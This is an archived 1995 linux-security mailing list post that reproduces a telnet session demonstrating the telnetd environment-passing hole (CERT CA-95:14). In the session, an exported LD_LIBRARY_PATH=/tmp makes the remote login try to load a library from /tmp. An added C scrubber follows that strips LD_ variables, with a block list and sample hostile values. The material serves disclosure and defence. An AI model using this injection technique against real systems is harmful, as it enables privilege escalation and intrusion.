[437] in linux-security and linux-alert archive
Telnet vulnerability: shared libraries (fwd)
daemon@ATHENA.MIT.EDU (matt sommer)
Sun Nov 5 16:21:32 1995
Date: Fri, 3 Nov 1995 12:37:43 -0800 (PST)
From: matt sommer <mms@elwha.evergreen.edu>
To: linux-security@tarsier.cv.nrao.edu
hey folks,
i am surprised that no one has cross posted this yet, so here it is...
in both the included posting from BUGTRAQ and the corresponding CERT
advisory (CA-95:14) they do not state explicitly that Slackware based
Linux is vulnerable but as you can see those of us using telnetd from
NetKit-B-0.05 definitely are...
--------
Script started on Wed Nov 1 23:13:13 1995
[23:13:13]:~$ telnet
telnet> env define LD_LIBRARY_PATH /tmp
telnet> env export LD_LIBRARY_PATH
telnet> set options
Will show option processing.
telnet> o xxx.xxx.xxx
Trying xxx.xxx.xxx...
Connected to xxx.xxx.xxx
Escape character is '^]'.
SENT DO SUPPRESS GO AHEAD
SENT WILL TERMINAL TYPE
SENT WILL NAWS
SENT WILL TSPEED
SENT WILL LFLOW
SENT WILL LINEMODE
SENT WILL ENVIRON <<<<<<<<<<<<<
SENT DO STATUS
SENT WILL XDISPLOC
RCVD DO AUTHENTICATION
SENT WONT AUTHENTICATION
RCVD WILL SUPPRESS GO AHEAD
RCVD DO TERMINAL TYPE
RCVD DO NAWS
SENT IAC SB NAWS 0 80 (80) 0 25 (25)
RCVD DO TSPEED
RCVD DO LFLOW
RCVD DONT LINEMODE
RCVD DO ENVIRON <<<<<<<<<<<<<
RCVD WILL STATUS
RCVD DO XDISPLOC
RCVD IAC SB TERMINAL-SPEED SEND
SENT IAC SB TERMINAL-SPEED IS 38400,38400
RCVD IAC SB X-DISPLAY-LOCATION SEND
SENT IAC SB X-DISPLAY-LOCATION IS "xxx:0.0"
RCVD IAC SB ENVIRON SEND
SENT IAC SB ENVIRON IS VAR "LD_LIBRARY_PATH" VALUE "/tmp" VAR "DISPLAY" VALUE "xxx:0.0"
RCVD IAC SB TERMINAL-TYPE SEND
SENT IAC SB TERMINAL-TYPE IS "XTERM"
RCVD DO ECHO
SENT WONT ECHO
RCVD WILL ECHO
SENT DO ECHO
Linux 1.2.8 (xxx.xxx.xxx)
Unauthorized access is a criminal offense.
If you are not an authorized user, disconnect NOW.
login: can't load library '/tmp/libc.so.4'
Permission denied
login: Connection closed by foreign host.
[23:14:34]:~$ exit
Script done on Wed Nov 1 23:14:40 1995
-------------
i believe that it might be possible to use the CERT wrapper ( see
CA-95:14 ) in login.c from the new shadow suite ( shadow-3.3.2 ) to
get login to "ignore" certain environment strings passed to it but
i haven't had much time to play with it...
cu,
m.
-----
just keeping the trains running...
[Mod: Repeat posting of Sam Hartman's <hartmans@MIT.EDU> bugtraq posting
deleted. --Jeff]
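An added example, not code from the original post nor from NetKit or the shadow suite: a C environment scrubber of the kind the login wrapper discussed above would run before exec()ing the real login binary. The session shows why it matters: the ENVIRON option lets the remote side hand telnetd an arbitrary LD_LIBRARY_PATH, telnetd passes it to login, and because telnetd runs login as root with matching real and effective IDs, ld.so's set-uid rule that ignores LD_* does not apply, so login tries to load its libc from /tmp. The scrubber drops every entry whose name starts with LD_ and keeps the rest. The sample environment below is constructed to mirror the ENVIRON IS line from the session, and the /bin/login.real path in the comment is a placeholder, not a path from the page.

```c
/*
 * Added example (not from the original post, NetKit, or the shadow suite):
 * scrub loader-controlling variables from an environment before exec()ing
 * the real login. A wrapper installed in place of /bin/login would do this
 * and then execve("/bin/login.real", argv, env)  -- placeholder path.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Name prefixes that steer the dynamic loader and must never come from
 * the network. "LD_" covers LD_LIBRARY_PATH, LD_PRELOAD, LD_AOUT_* etc. */
static const char *const blocked_prefixes[] = { "LD_" };

/* Returns 1 if a "NAME=value" entry should be dropped, 0 otherwise. */
int env_entry_is_blocked(const char *entry)
{
    size_t i;
    for (i = 0; i < sizeof blocked_prefixes / sizeof blocked_prefixes[0]; i++) {
        size_t n = strlen(blocked_prefixes[i]);
        if (strncmp(entry, blocked_prefixes[i], n) == 0)
            return 1;
    }
    return 0;
}

/*
 * Removes blocked entries from a NULL-terminated environment array in
 * place, keeping the survivors in their original order.
 * Returns the number of entries removed.
 */
size_t scrub_environment(char **env)
{
    size_t in, out = 0, removed = 0;
    for (in = 0; env[in] != NULL; in++) {
        if (env_entry_is_blocked(env[in]))
            removed++;
        else
            env[out++] = env[in];
    }
    env[out] = NULL;
    return removed;
}

int main(void)
{
    /* Constructed environment mirroring what the ENVIRON IS in the session
     * delivered to telnetd, plus a second LD_ variable for illustration. */
    char *env[] = {
        "LD_LIBRARY_PATH=/tmp",
        "DISPLAY=xxx:0.0",
        "TERM=xterm",
        "LD_PRELOAD=/tmp/x.so",
        NULL
    };
    size_t removed = scrub_environment(env);
    size_t i;

    printf("removed %lu loader variable(s); passing on:\n", (unsigned long)removed);
    for (i = 0; env[i] != NULL; i++)
        printf("  %s\n", env[i]);

    /* A real wrapper would now execve("/bin/login.real", argv, env)
     * (placeholder path) and exit with an error if execve returns. */
    return 0;
}
```

Scrubbing by name prefix rather than by an allow-list is the minimal fix matching the advisory's advice; a stricter wrapper would instead pass only the handful of variables login actually needs (TERM, DISPLAY and the like), which also covers loader variables with vendor-specific names.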